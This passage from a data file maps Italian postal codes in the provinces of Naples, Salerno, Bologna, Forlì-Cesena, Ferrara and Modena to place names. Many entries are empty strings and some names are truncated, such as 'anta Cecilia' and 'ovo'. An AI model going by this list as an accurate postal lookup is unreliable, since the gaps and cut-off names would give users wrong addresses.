[["Agerola", "NA"], ["Pianillo", "NA"], ["", "NA"], ["Bomerano", "NA"]], "80053": [ ["", "NA"], ["Scanzano", "NA"], ["", "NA"], ["Quisisana", "NA"], ], "80054": [["Caprile", "NA"], ["Gragnano", "NA"]], "80055": [["Portici", "NA"], ["Bellavista", "NA"]], "80056": [["Ercolano", "NA"], ["Resina", "NA"]], "80057": [["", "NA"]], "80058": [["", "NA"]], "80059": [["", "NA"], ["Leopardi", "NA"], ["", "NA"]], "80060": [["Massaquano", "NA"], ["", "NA"]], "80061": [ ["", "NA"], ["Nerano", "NA"], ["", "NA"], ["Termini", "NA"], ["", "NA"], ], "80062": [["Meta", "NA"]], "80063": [["", "NA"]], "80065": [["Sant'Agnello", "NA"], ["", "NA"]], "80066": [["Seiano", "NA"], ["Fornacelle", "NA"], ["Montechiaro", "NA"], ["Fornacella", "NA"]], "80067": [["Priora", "NA"], ["", "NA"], ["Sorrento", "NA"]], "80069": [["Moiano", "NA"], ["", "NA"], ["", "NA"]], "80070": [ ["Buonopane", "NA"], ["Succhivo", "NA"], ["Fontana", "NA"], ["Miliscola", "NA"], ["", "NA"], ["", "NA"], ["Serrara", "NA"], ["Fusaro", "NA"], ["Torregaveta", "NA"], ["Bacoli", "NA"], ["", "NA"], ["Miseno", "NA"], ["Sant'Angelo", "NA"], ["", "NA"], ["", "NA"], ["Cappella", "NA"], ["Cuma", "NA"], ["Baia", "NA"], ], "80071": [["Anacapri", "NA"]], "80073": [["", "NA"], ["Capri", "NA"]], "80074": [["", "NA"]], "80075": [["Forio", "NA"], ["Panza", "NA"], ["Monterone", "NA"]], "80076": [["", "NA"]], "80077": [ ["", "NA"], ["", "NA"], ["", "NA"], ["Ischia", "NA"], ["", "NA"], ["", "NA"], ], "80078": [ ["Pozzuoli", "NA"], ["Lucrino", "NA"], ["", "NA"], ["Monterusciello", "NA"], ["", "NA"], ["Cappuccini", "NA"], ["", "NA"], ["Licola", "NA"], ], "80079": [["Procida", "NA"]], "80100": [["Napoli", "NA"]], "80121": [["Napoli", "NA"]], "80122": [["Napoli", "NA"], ["Chiaia", "NA"]], "80123": [["Napoli", "NA"]], "80124": [["Napoli", "NA"], ["Bagnoli", "NA"]], "80125": [["Napoli", "NA"], ["Agnano", "NA"]], "80126": [["Pianura", "NA"], ["Napoli", "NA"], ["Soccavo", "NA"]], "80127": [["Vomero", "NA"], ["Napoli", "NA"]], "80128": [["Napoli", "NA"]], "80129": [["Napoli", "NA"]], "80131": [["Napoli", "NA"], ["Miano", "NA"], ["Arenella", "NA"], ["", "NA"]], "80132": [["Napoli", "NA"]], "80133": [["Napoli", "NA"]], "80134": [["Napoli", "NA"]], "80135": [["Napoli", "NA"]], "80136": [["Napoli", "NA"]], "80137": [["Napoli", "NA"]], "80138": [["Napoli", "NA"]], "80139": [["Napoli", "NA"]], "80141": [["Napoli", "NA"]], "80142": [["Napoli", "NA"]], "80143": [["Napoli", "NA"]], "80144": [["Napoli", "NA"], ["", "NA"], ["Secondigliano", "NA"]], "80145": [ ["Marianella", "NA"], ["", "NA"], ["Scampia", "NA"], ["Miano", "NA"], ["Piscinola", "NA"], ["Napoli", "NA"], ], "80146": [["Napoli", "NA"], ["", "NA"]], "80147": [["Barra", "NA"], ["Ponticelli", "NA"], ["Napoli", "NA"]], "84010": [ ["Atrani", "SA"], ["Ravello", "SA"], ["Cetara", "SA"], ["", "SA"], ["Minori", "SA"], ["Corbara", "SA"], ["Tramonti", "SA"], ["", "SA"], ["Praiano", "SA"], ["Furore", "SA"], ["Campinola", "SA"], ["", "SA"], ["", "SA"], ["Pontone", "SA"], ["", "SA"], ["Scala", "SA"], ["Erchie", "SA"], ["Maiori", "SA"], ["", "SA"], ], "84011": [ ["Pastena", "SA"], ["", "SA"], ["Pogerola", "SA"], ["", "SA"], ["Lone", "SA"], ["Amalfi", "SA"], ], "84012": [["Angri", "SA"]], "84013": [ ["", "SA"], ["Passiano", "SA"], ["San Pietro Di Cava", "SA"], ["", "SA"], ["", "SA"], ["Pregiato", "SA"], ["Arcara", "SA"], ["", "SA"], ["Dupino", "SA"], ["Alessia", "SA"], ["Marini", "SA"], ], "84014": [["Nocera Inferiore", "SA"]], "84015": [["Nocera Superiore", "SA"], ["Materdomini Di Nocera", "SA"]], "84016": [["Pagani", "SA"]], "84017": [["Positano", "SA"], ["Montepertuso", "SA"]], "84018": [["San Pietro Di Scafati", "SA"], ["Scafati", "SA"]], "84019": [ ["Benincasa", "SA"], ["Raito", "SA"], ["", "SA"], ["Dragonea", "SA"], ["", "SA"], ["", "SA"], ["Molina", "SA"], ], "84020": [ ["", "SA"], ["Controne", "SA"], ["Santomenna", "SA"], ["Ottati", "SA"], ["Valva", "SA"], ["Colliano", "SA"], ["", "SA"], ["Aquara", "SA"], ["Perrazze", "SA"], ["Bellosguardo", "SA"], ["Ricigliano", "SA"], ["", "SA"], ["Palomonte", "SA"], ["", "SA"], ["Salvitelle", "SA"], ["", "SA"], ["Laviano", "SA"], ["Roscigno", "SA"], ["Castelcivita", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["Petina", "SA"], ["Centro Urbano", "SA"], ], "84021": [["Tufariello", "SA"], ["Buccino", "SA"], ["Buccino Stazione", "SA"]], "84022": [["Serradarce", "SA"], ["Puglietta", "SA"], ["Quadrivio", "SA"], ["Campagna", "SA"]], "84023": [["Persano", "SA"]], "84024": [["", "SA"], ["", "SA"]], "84025": [ ["anta Cecilia", "SA"], ["Santa Cecilia Di Eboli", "SA"], ["", "SA"], ["Eboli", "SA"], ], "84026": [["Postiglione", "SA"]], "84027": [["", "SA"]], "84028": [["", "SA"], ["Serre", "SA"]], "84029": [ ["", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["Zuppino", "SA"], ["Scorzo", "SA"], ], "84030": [ ["Torraca", "SA"], ["Sanza", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["Sicili'", "SA"], ["Pertosa", "SA"], ["Caggiano", "SA"], ["Taverne", "SA"], ["Tortorella", "SA"], ["Morigerati", "SA"], ["", "SA"], ["", "SA"], ["Battaglia", "SA"], ["Casalbuono", "SA"], ["", "SA"], ], "84031": [["Auletta", "SA"]], "84032": [["Buonabitacolo", "SA"]], "84033": [ ["", "SA"], ["", "SA"], ["Tardiano", "SA"], ["", "SA"], ["Arenabianca", "SA"], ], "84034": [["", "SA"], ["Padula", "SA"]], "84035": [["Polla", "SA"]], "84036": [["", "SA"], ["Trinita'", "SA"]], "84037": [["Sant'Arsenio", "SA"]], "84038": [["Sassano", "SA"], ["Caiazzano", "SA"], ["Silla", "SA"]], "84039": [ ["", "SA"], ["", "SA"], ["Teggiano", "SA"], ["", "SA"], ], "84040": [ ["Poderia", "SA"], ["Velina", "SA"], ["Cannalonga", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["Alfano", "SA"], ["Ponte", "SA"], ["Campora", "SA"], ["Acquavella", "SA"], ["", "SA"], ], "84042": [["Acerno", "SA"]], "84043": [["Agropoli Stazione", "SA"], ["Agropoli", "SA"]], "84044": [["Matinella", "SA"], ["Albanella", "SA"]], "84045": [["", "SA"], ["Carillia", "SA"], ["", "SA"], ["Cerrelli", "SA"]], "84046": [ ["", "SA"], ["", "SA"], ["Terradura", "SA"], ["Catona", "SA"], ["", "SA"], ["Ascea", "SA"], ["", "SA"], ["Mandia", "SA"], ], "84047": [ ["Paestum", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["Capaccio", "SA"], ["Gromola", "SA"], ["Laura", "SA"], ["Cafasso", "SA"], ["Vannullo", "SA"], ["ovo", "SA"], ["", "SA"], ["Licinella", "SA"], ["Santa Venere", "SA"], ["Rettifilo", "SA"], ], "84048": [ ["San Marco", "SA"], ["Castellabate", "SA"], ["Santa Maria", "SA"], ["Santa Maria Di Castellabate", "SA"], ["", "SA"], ], "84049": [["", "SA"]], "84050": [ ["Laurito", "SA"], ["Capitello", "SA"], ["", "SA"], ["Giungano", "SA"], ["", "SA"], ["Lustra", "SA"], ["Matonti", "SA"], ["Ispani", "SA"], ["", "SA"], ["Capizzo", "SA"], ["", "SA"], ["Futani", "SA"], ["Sorvaro", "SA"], ], "84051": [ ["San Severino", "SA"], ["San Severino Di Centola", "SA"], ["Foria", "SA"], ["Centola", "SA"], ["San Nicola", "SA"], ["San Nicola Di Centola", "SA"], ["Palinuro", "SA"], ], "84052": [ ["San Biase", "SA"], ["Ceraso", "SA"], ["Santa Barbara", "SA"], ["San Sumino", "SA"], ["Massascusa", "SA"], ], "84053": [["", "SA"], ["Cicerale", "SA"]], "84055": [["Felitto", "SA"]], "84056": [["Cardile", "SA"], ["Gioi", "SA"]], "84057": [["", "SA"], ["Laurino", "SA"]], "84059": [["Lentiscosa", "SA"], ["Camerota", "SA"], ["Licusati", "SA"], ["", "SA"]], "84060": [ ["Vatolla", "SA"], ["Montecorice", "SA"], ["", "SA"], ["Abatemarco", "SA"], ["Massicelle", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ["Omignano", "SA"], ["Acquavena", "SA"], ["", "SA"], ["Orria", "SA"], ["Ostigliano", "SA"], ["", "SA"], ["", "SA"], ["Pellare", "SA"], ["Case Del Conte", "SA"], ["", "SA"], ["Perdifumo", "SA"], ["Roccagloriosa", "SA"], ["Ortodonico", "SA"], ["Fornelli", "SA"], ["", "SA"], ["Perito", "SA"], ["", "SA"], ], "84061": [["Eredita", "SA"], ["", "SA"], ["Finocchito", "SA"]], "84062": [ ["", "SA"], ["Salitto", "SA"], ["Monticelli", "SA"], ["Ariano", "SA"], ["Valle", "SA"], ], "84065": [["Piaggine", "SA"]], "84066": [["Pisciotta", "SA"], ["", "SA"], ["Rodio", "SA"], ["Caprioli", "SA"]], "84067": [["Santa Marina", "SA"], ["", "SA"]], "84068": [ ["", "SA"], ["Celso", "SA"], ["Pollica", "SA"], ["Pioppi", "SA"], ["Acciaroli", "SA"], ["Galdo", "SA"], ["Cannicchio", "SA"], ], "84069": [["Acquaviva", "SA"], ["Carratiello", "SA"], ["Fonte", "SA"], ["Roccadaspide", "SA"], ["Serra", "SA"]], "84070": [ ["San Mauro La Bruca", "SA"], ["Scario", "SA"], ["Rofrano", "SA"], ["Bosco", "SA"], ["", "SA"], ["San Mauro Cilento", "SA"], ["Trentinara", "SA"], ["Salento", "SA"], ["Rutino", "SA"], ["", "SA"], ["Sacco", "SA"], ["San Giov", "SA"], ["Casalsottano", "SA"], ["Serramezzana", "SA"], ], "84073": [["Sapri", "SA"]], "84074": [ ["San Mango Cilento", "SA"], ["San Mango", "SA"], ["Santa Lucia Cilento", "SA"], ["Sessa Cilento", "SA"], ], "84075": [["Gorga", "SA"], ["Stio", "SA"]], "84076": [["Copersito", "SA"], ["Copersito Cilento", "SA"], ["Torchiara", "SA"]], "84077": [["Torre Orsaia", "SA"], ["", "SA"]], "84078": [["Pattano", "SA"], ["Angellara", "SA"], ["", "SA"], ["", "SA"]], "84079": [["Vibonati", "SA"], ["Villammare", "SA"]], "84080": [ ["Capezzano Inferiore", "SA"], ["Capezzano", "SA"], ["Capezzano Superiore", "SA"], ["Calvanico", "SA"], ["Capriglia", "SA"], ["Pellezzano", "SA"], ["Cologna", "SA"], ["Coperchia", "SA"], ], "84081": [ ["Baronissi", "SA"], ["Antessano", "SA"], ["Fusara", "SA"], ["Acquamela", "SA"], ["Saragnano", "SA"], ["Caprecano", "SA"], ["Sava", "SA"], ], "84082": [["Manzi", "SA"], ["Bracigliano", "SA"], ["San Nazario", "SA"]], "84083": [["Castelluccio", "SA"], ["Fimiani", "SA"], ["", "SA"], ["Lanzara", "SA"]], "84084": [ ["Villa", "SA"], ["Pizzolano", "SA"], ["Fisciano", "SA"], ["Settefichi", "SA"], ["Lancusi", "SA"], ["Bolano", "SA"], ["Penta", "SA"], ["Gaiano", "SA"], ], "84085": [ ["Spiano", "SA"], ["Carifi", "SA"], ["Curteri", "SA"], ["Sant'Angelo", "SA"], ["Pandola", "SA"], ["Ciorani", "SA"], ["Torello", "SA"], ["", "SA"], ["verino", "SA"], ["Sant'Eustachio", "SA"], ["Monticelli", "SA"], ["Acquarola", "SA"], ["", "SA"], ], "84086": [["", "SA"], ["", "SA"], ["Roccapiemonte", "SA"]], "84087": [["Lavorate", "SA"], ["Episcopio", "SA"], ["Sarno", "SA"]], "84088": [["Siano", "SA"]], "84090": [ ["Capitignano", "SA"], ["Prepezzano", "SA"], ["San ", "SA"], ["", "SA"], ["Sieti", "SA"], ["Castelpagano", "SA"], ["Pugliano", "SA"], ["", "SA"], ["", "SA"], ["", "SA"], ], "84091": [ ["Battipaglia", "SA"], [" Di Battipaglia", "SA"], ["Sant'Anna", "SA"], ["Belvedere Di Battipaglia", "SA"], ], "84092": [["Bivio", "SA"], ["Bellizzi", "SA"]], "84095": [ ["", "SA"], ["Mercato", "SA"], ["Curti", "SA"], ["Santa Caterina", "SA"], ["Ornito", "SA"], ["San Giovanni", "SA"], ], "84096": [ ["", "SA"], ["Gauro", "SA"], ["Macchia", "SA"], ["San Martino Montecorv", "SA"], ["Lenzi", "SA"], ], "84098": [ ["", "SA"], ["Pontecagnano", "SA"], ["Magazzeno", "SA"], ["Sant'Antonio", "SA"], ["Corvinia", "SA"], ["", "SA"], ["Faiano", "SA"], ], "84099": [ ["", "SA"], ["Pezzano", "SA"], ["Campigliano", "SA"], ["Vignale", "SA"], ["Filetta", "SA"], ], "84100": [["Salerno", "SA"]], "84121": [["Salerno", "SA"]], "84122": [["Salerno", "SA"]], "84123": [["Salerno", "SA"]], "84124": [["Salerno", "SA"]], "84125": [["Salerno", "SA"]], "84126": [["Salerno", "SA"]], "84127": [["Salerno", "SA"], ["", "SA"]], "84128": [["", "SA"], ["Salerno", "SA"]], "84129": [["Salerno", "SA"]], "84131": [["Salerno", "SA"], ["", "SA"], ["Fuorni", "SA"], ["", "SA"]], "84132": [["Salerno", "SA"]], "84133": [["Salerno", "SA"]], "84134": [["Giovi", "SA"], ["Salerno", "SA"]], "84135": [["Fratte", "SA"], ["Salerno", "SA"], ["Ogliara", "SA"], ["Matierno", "SA"]], "40010": [ ["Bentivoglio", "BO"], ["", "BO"], ["", "BO"], ["Padulle", "BO"], ["Interporto Bentivoglio", "BO"], ["Santa Maria In Duno", "BO"], ["Sala Bolognese", "BO"], ], "40011": [ ["", "BO"], ["", "BO"], ["", "BO"], ["Santa Maria In Strada", "BO"], ], "40012": [ ["Bargellino", "BO"], ["", "BO"], ["", "BO"], ["Longara", "BO"], ["Lippo", "BO"], ["", "BO"], ], "40013": [ ["", "BO"], ["", "BO"], ["Progresso", "BO"], ["Trebbo", "BO"], ["", "BO"], ], "40014": [["Caselle", "BO"], ["", "BO"], ["Crevalcore", "BO"]], "40015": [ ["", "BO"], ["Bosco", "BO"], ["", "BO"], ["Galliera", "BO"], ["", "BO"], ["", "BO"], ], "40016": [["", "BO"]], "40017": [ ["Decima", "BO"], [" In Persiceto", "BO"], ["", "BO"], ["", "BO"], ["Budrie", "BO"], ], "40018": [["Maccaretolo", "BO"], ["San Pietro In Casale", "BO"]], "40019": [["Sant'Agata Bolognese", "BO"]], "40020": [["Casalfiumanese", "BO"]], "40021": [["Tossignano", "BO"], ["", "BO"]], "40022": [ ["", "BO"], ["Moraduccio", "BO"], ["Sassoleone", "BO"], ["", "BO"], ["Giugnola", "BO"], ], "40023": [["", "BO"]], "40024": [ ["", "BO"], ["", "BO"], ["", "BO"], ["Gallo", "BO"], ["Gaiana", "BO"], ], "40025": [["Fontanelice", "BO"], ["Carseggio", "BO"]], "40026": [ ["", "BO"], ["", "BO"], ["Imola", "BO"], ["Ponticelli", "BO"], ["Piratello", "BO"], ["", "BO"], ["", "BO"], ], "40027": [["Bubano", "BO"], ["Mordano", "BO"]], "40030": [ ["", "BO"], ["Berzantina", "BO"], ["Badi", "BO"], ["", "BO"], ["", "BO"], ["Piandisetta", "BO"], ["", "BO"], ["", "BO"], ["Suviana", "BO"], ], "40032": [["", "BO"], ["Bargi", "BO"], ["Camugnano", "BO"]], "40033": [["", "BO"], ["Ceretolo", "BO"], ["Cantagallo", "BO"]], "40034": [ ["", "BO"], ["", "BO"], ["", "BO"], ["", "BO"], ], "40035": [["", "BO"], ["Baragazza", "BO"], ["Lagaro", "BO"], ["Creda", "BO"]], "40036": [["Rioveggio", "BO"], ["Monzuno", "BO"], ["Vado", "BO"]], "40037": [["", "BO"], ["", "BO"], ["Fontana", "BO"], ["Borgonuovo", "BO"]], "40038": [["Susano", "BO"], ["Tole'", "BO"], ["Vergato", "BO"], ["Cereglio", "BO"], ["Riola", "BO"]], "40041": [ ["Marano", "BO"], ["", "BO"], ["Silla", "BO"], ["Bombiana", "BO"], ["", "BO"], ], "40042": [ ["Querciola", "BO"], ["Vidiciatico", "BO"], ["", "BO"], ["", "BO"], ["Pianaccio", "BO"], ["", "BO"], ["", "BO"], ], "40043": [["", "BO"], ["", "BO"], ["Marzabotto", "BO"], ["", "BO"]], "40046": [ ["Capugnano", "BO"], ["", "BO"], ["", "BO"], ["", "BO"], ["", "BO"], ["Castelluccio", "BO"], ["Granaglione", "BO"], ["Vizzero", "BO"], ["", "BO"], ["", "BO"], ], "40048": [ ["", "BO"], ["", "BO"], ["", "BO"], ["", "BO"], ], "40050": [ ["", "BO"], ["Castelletto", "BO"], ["Funo", "BO"], ["", "BO"], ["", "BO"], ["", "BO"], ["", "BO"], ["Centergross", "BO"], ["Monteveglio", "BO"], ["", "BO"], ["Loiano", "BO"], ["Gavignano", "BO"], ["Bisano", "BO"], ["Monterenzio", "BO"], ["Argelato", "BO"], ["", "BO"], ["Pizzano", "BO"], ["Calderino", "BO"], ["Casadio", "BO"], ["Savazza", "BO"], ["Venezzano", "BO"], ], "40051": [["Altedo", "BO"], ["Casoni", "BO"], ["Malalbergo", "BO"], ["Pegola", "BO"]], "40052": [["Boschi", "BO"], ["Baricella", "BO"], ["Mondonuovo", "BO"], ["", "BO"]], "40053": [["Valsamoggia", "BO"], ["Bazzano", "BO"]], "40054": [["Vedrana", "BO"], ["Bagnarola", "BO"], ["Riccardina", "BO"], ["Budrio", "BO"], ["Mezzolara", "BO"]], "40055": [["Fiesso", "BO"], ["Villanova", "BO"], ["Castenaso", "BO"]], "40056": [["Muffa", "BO"], ["Pragatto", "BO"], ["Crespellano", "BO"], ["Calcara", "BO"]], "40057": [ ["", "BO"], ["", "BO"], ["Lovoleto", "BO"], ["", "BO"], ], "40059": [ ["Portonovo", "BO"], ["Buda", "BO"], ["Medicina", "BO"], ["Ganzanigo", "BO"], ["Sant'Antonio", "BO"], ["", "BO"], ], "40060": [ ["", "BO"], ["Dozza", "BO"], ["Savigno", "BO"], ["Toscanella", "BO"], ["Vedegheto", "BO"], ], "40061": [["Minerbio", "BO"], ["", "BO"]], "40062": [ ["Marmorta", "BO"], ["", "BO"], ["Molinella", "BO"], ["Selva", "BO"], ["", "BO"], ["", "BO"], ], "40063": [["Monghidoro", "BO"]], "40064": [["Mercatale", "BO"], ["", "BO"]], "40065": [["Pianoro", "BO"], ["Livergnano", "BO"], ["", "BO"]], "40066": [["", "BO"]], "40067": [["Rastignano", "BO"]], "40068": [ ["", "BO"], ["Ponticella", "BO"], ["", "BO"], ["", "BO"], ["Farneto", "BO"], ["", "BO"], ["Pulce", "BO"], ], "40069": [["", "BO"], ["Riale", "BO"], ["Z", "BO"], ["Zola", "BO"]], "40100": [["Bologna", "BO"]], "40121": [["Bologna", "BO"]], "40122": [["Bologna", "BO"]], "40123": [["Bologna", "BO"]], "40124": [["Bologna", "BO"]], "40125": [["Bologna", "BO"]], "40126": [["Bologna", "BO"]], "40127": [["Bologna", "BO"], ["San Donnino", "BO"]], "40128": [["Bologna", "BO"], ["Corticella", "BO"]], "40129": [["Bologna", "BO"]], "40131": [["Bologna", "BO"], ["Bertalia", "BO"]], "40132": [["Borgo Panigale", "BO"], ["Bologna", "BO"]], "40133": [["Bologna", "BO"]], "40134": [["Bologna", "BO"]], "40135": [["Bologna", "BO"], ["Casaglia", "BO"]], "40136": [["Roncrio", "BO"], ["Gaibola", "BO"], ["Bologna", "BO"], ["Paderno", "BO"]], "40137": [["Bologna", "BO"]], "40138": [["Bologna", "BO"], ["Roveri", "BO"]], "40139": [["Bologna", "BO"]], "40141": [["Bologna", "BO"], ["San Ruffillo", "BO"], ["", "BO"]], "47010": [ ["", "FC"], ["Bocconi", "FC"], ["", "FC"], ["Portico E ", "FC"], ["San Benedetto In Alpe", "FC"], ["Galeata", "FC"], ["Premilcuore", "FC"], ], "47011": [["Terra Del Sole", "FC"], ["", "FC"], ["", "FC"]], "47012": [["Cusercoli", "FC"], ["Voltre", "FC"], ["Nespoli", "FC"], ["", "FC"]], "47013": [["San Ruffillo", "FC"], ["Dovadola", "FC"]], "47014": [ ["Teodorano", "FC"], ["Rico'", "FC"], ["San Colombano", "FC"], ["Meldola", "FC"], ["San Colombano Di Meldola", "FC"], ["Vitignano", "FC"], ["Para", "FC"], ], "47015": [["Santa Reparata", "FC"], ["Modigliana", "FC"]], "47016": [ ["Tontola", "FC"], ["", "FC"], ["Predappio", "FC"], ["", "FC"], ["Fiumana", "FC"], ], "47017": [["", "FC"], ["Calbola", "FC"]], "47018": [["Biserno", "FC"], ["Corniolo", "FC"], ["Santa Sofia", "FC"]], "47019": [["Tredozio", "FC"]], "47020": [["Budrio", "FC"], ["Longiano", "FC"], ["Roncofreddo", "FC"], ["Montiano", "FC"], ["Oriola", "FC"]], "47021": [ ["", "FC"], ["Vessa", "FC"], ["Selvapiana", "FC"], ["San Piero In Bagno", "FC"], ["", "FC"], ], "47023": [ ["Bulgaria", "FC"], ["Cesuola", "FC"], ["Diegaro", "FC"], ["Saiano", "FC"], ["", "FC"], ["Sant'Egidio", "FC"], ["", "FC"], ["", "FC"], ["", "FC"], ["San Mauro In Valle", "FC"], ["Pievesestina", "FC"], ["", "FC"], ["Lizzano", "FC"], ["Macerone", "FC"], ["Celletta", "FC"], ["Gattolino", "FC"], ["", "FC"], ["Roversano", "FC"], ["Aie", "FC"], ["Cesena", "FC"], ["Calisese", "FC"], ["Tessello", "FC"], ["Martorano", "FC"], ["Ronta", "FC"], ["Borello", "FC"], ["Settecrociari", "FC"], ["", "FC"], ], "47025": [ ["Tornano", "FC"], ["Bacciolino", "FC"], ["", "FC"], ["Ciola", "FC"], ["Cella", "FC"], ["", "FC"], ["Piavola", "FC"], ["Linaro", "FC"], ["", "FC"], ], "47027": [ ["Sorbano", "FC"], ["", "FC"], ["Ranchio", "FC"], ["", "FC"], ["Sarsina", "FC"], ["Quarto", "FC"], ], "47028": [["Alfero", "FC"], ["Balze", "FC"], ["Verghereto", "FC"]], "47030": [ ["", "FC"], ["", "FC"], ["Borghi", "FC"], ["", "FC"], ["", "FC"], ["", "FC"], [" In Converseto", "FC"], ["Montegelli", "FC"], ["Rontagnano", "FC"], ["Montepetra", "FC"], ["", "FC"], ], "47032": [ ["", "FC"], ["Polenta", "FC"], ["Capocolle", "FC"], ["Collinello", "FC"], ["Panighina", "FC"], ["", "FC"], ["Bertinoro", "FC"], ["", "FC"], ], "47034": [["Forlimpopoli", "FC"], ["Selbagnone", "FC"]], "47035": [["Gambettola", "FC"]], "47039": [["", "FC"], ["", "FC"]], "47042": [["Bagnarola", "FC"], ["Cesenatico", "FC"], ["Villalta", "FC"], ["Sala", "FC"]], "47043": [["Gatteo", "FC"], ["", "FC"], ["", "FC"]], "47100": [ ["Villanova", "FC"], ["Pianta", "FC"], ["San Martino In Strada", "FC"], ["Rovere", "FC"], ["Barisano", "FC"], ["Ronco", "FC"], ["Villafranca", "FC"], ["Roncadello", "FC"], ["Carpinello", "FC"], ["San Lorenzo In Noceto", "FC"], ["", "FC"], ["", "FC"], ["Carpena", "FC"], ["Cava", "FC"], ["Vecchiazzano", "FC"], ], "47121": [["Forlì", "FC"]], "47122": [["Forlì", "FC"]], "44011": [ ["Argenta", "FE"], ["Ospital Monacale", "FE"], ["Anita", "FE"], ["Campotto", "FE"], ["Filo", "FE"], ["Traghetto", "FE"], ["La Fiorana", "FE"], ["San Nicolo'", "FE"], ["Boccaleone", "FE"], ["Longastrino", "FE"], ["Bando", "FE"], ["San Biagio", "FE"], ["Santa Maria Codifiume", "FE"], ["Consandolo", "FE"], ], "44012": [ ["Ospitale", "FE"], ["Pilastri", "FE"], ["Stellata", "FE"], ["Scortichino", "FE"], ["Burana", "FE"], ["Gavello", "FE"], ["Bondeno", "FE"], ], "44014": [["", "FE"]], "44015": [ ["Portomaggiore", "FE"], ["Maiero", "FE"], ["Gambulaga", "FE"], ["Ripapersico", "FE"], ["Portoverrara", "FE"], ["Runco", "FE"], ], "44019": [["Voghenza", "FE"], ["Montesanto", "FE"], ["Voghiera", "FE"]], "44020": [ ["", "FE"], ["", "FE"], ["", "FE"], ["Gorino", "FE"], ["", "FE"], ["Goro", "FE"], ["Medelana", "FE"], ["", "FE"], ["", "FE"], ["", "FE"], ["Ostellato", "FE"], ["Dogato", "FE"], ], "44021": [ ["Pomposa", "FE"], ["Codigoro", "FE"], ["Pontemaodino", "FE"], ["Mezzogoro", "FE"], ["Pontelangorino", "FE"], ], "44022": [["", "FE"], ["Volania", "FE"], ["Comacchio", "FE"], ["Vaccolino", "FE"]], "44023": [["Marozzo", "FE"], ["Lagosanto", "FE"]], "44026": [ ["Bosco", "FE"], ["Mesola", "FE"], ["", "FE"], ["Massenzatica", "FE"], ["Monticelli", "FE"], ["", "FE"], ["Ariano", "FE"], ], "44027": [["Migliaro", "FE"], ["", "FE"], ["Migliarino", "FE"], ["Fiscaglia", "FE"]], "44028": [["", "FE"], ["Coronella", "FE"], ["Gallo", "FE"], ["", "FE"]], "44029": [["Lido Di Spina", "FE"], ["Lido Degli Estensi", "FE"], ["Porto Garibaldi", "FE"]], "44030": [ ["Alberone Di Ro", "FE"], ["Guarda", "FE"], ["Ruina", "FE"], ["", "FE"], ["Alberone Di Guarda", "FE"], ], "44033": [["Ro", "FE"], ["Cologna", "FE"], ["Serravalle", "FE"], ["Berra", "FE"]], "44034": [ ["Tamara", "FE"], ["Fossalta", "FE"], ["Copparo", "FE"], ["Ambrogio", "FE"], ["Cesta", "FE"], ["", "FE"], ["Saletta", "FE"], ["Zenzalino", "FE"], ["Coccanile", "FE"], ["", "FE"], ["Gradizza", "FE"], ], "44035": [["Brazzolo", "FE"]], "44037": [["", "FE"]], "44039": [["Formignana", "FE"], ["Tresigallo", "FE"], ["Rero", "FE"], ["Final Di Rero", "FE"]], "44041": [["Casumaro", "FE"], ["", "FE"], ["Buonacompra", "FE"]], "44042": [ ["Penzale", "FE"], ["", "FE"], ["Alberone", "FE"], ["Cento", "FE"], ["Alberone Di Cento", "FE"], ["", "FE"], ], "44043": [["Mirabello", "FE"]], "44045": [["", "FE"], ["Renazzo", "FE"]], "44047": [["Dosso", "FE"], ["", "FE"], ["Sant'Agostino", "FE"]], "44049": [["", "FE"], ["", "FE"]], "44121": [["Ferrara", "FE"]], "44122": [["Ferrara", "FE"]], "44123": [["Ferrara", "FE"]], "44124": [["Ferrara", "FE"]], "41011": [["Panzano", "MO"], ["", "MO"], ["Campogalliano", "MO"]], "41012": [ ["Gargallo", "MO"], ["Budrione", "MO"], ["Fossoli", "MO"], ["Cortile", "MO"], ["Carpi", "MO"], ["", "MO"], ["Migliarina", "MO"], ["", "MO"], ["Santa Croce", "MO"], ], "41013": [ ["", "MO"], ["", "MO"], ["Riolo", "MO"], ["Cavazzona", "MO"], ["Rastellino", "MO"], ["Recovato", "MO"], ["Manzolino", "MO"], ["Piumazzo", "MO"], ], "41014": [ ["", "MO"], ["", "MO"], ["", "MO"], ["", "MO"], ], "41015": [ ["Bagazzano", "MO"], ["Nonantola", "MO"], ["", "MO"], ["", "MO"], ["Campazzo", "MO"], ["Redu'", "MO"], ], "41016": [["", "MO"], ["", "MO"], ["Novi Di Modena", "MO"]], "41017": [["Ravarino", "MO"], ["Stuffione", "MO"]], "41018": [["San Cesario Sul Panaro", "MO"]], "41019": [["Soliera", "MO"], ["Sozzigalli", "MO"], ["Appalto", "MO"], ["Limidi", "MO"]], "41020": [ ["", "MO"], ["Serpiano", "MO"], ["Castello", "MO"], ["Groppo", "MO"], ["Riolunato", "MO"], ["Castellino", "MO"], ], "41021": [ ["Canevare", "MO"], ["", "MO"], ["Ospitale", "MO"], ["Fellicarolo", "MO"], ["Serrazzone", "MO"], ["Lotta", "MO"], ["Fanano", "MO"], ["Trignano", "MO"], ["", "MO"], ["", "MO"], ], "41022": [["Fiumalbo", "MO"], ["", "MO"], ["Faidello", "MO"]], "41023": [ ["Sassostorno", "MO"], ["Vaglio", "MO"], ["Montecenere", "MO"], ["", "MO"], ["Lama", "MO"], ["Barigazzo", "MO"], ["Mocogno", "MO"], ["Cadignano", "MO"], ["", "MO"], ["Pianorso", "MO"], ], "41025": [["Montecreto", "MO"], ["Acquaria", "MO"]], "41026": [ ["Gaianello", "MO"], ["Castagneto", "MO"], ["Niviano", "MO"], ["Frassineti", "MO"], ["Monzone", "MO"], ["Sant'Antonio", "MO"], ["", "MO"], ["Gaiato", "MO"], ["Olina", "MO"], ["Montebonello", "MO"], ["Miceno", "MO"], ["Benedello", "MO"], ["Camatta", "MO"], ["Renno", "MO"], ["Iddiano", "MO"], ["Montorso", "MO"], ["", "MO"], ["Crocette", "MO"], ["Coscogno", "MO"], ["Verica", "MO"], ["Montecuccolo", "MO"], ], "41027": [ ["Pievepelago", "MO"], ["Tagliole", "MO"], ["", "MO"], ["Roccapelago", "MO"], ["", "MO"], ], "41028": [ ["Faeto", "MO"], ["", "MO"], ["", "MO"], ["", "MO"], ["Varana", "MO"], ["", "MO"], ["Ligorzano", 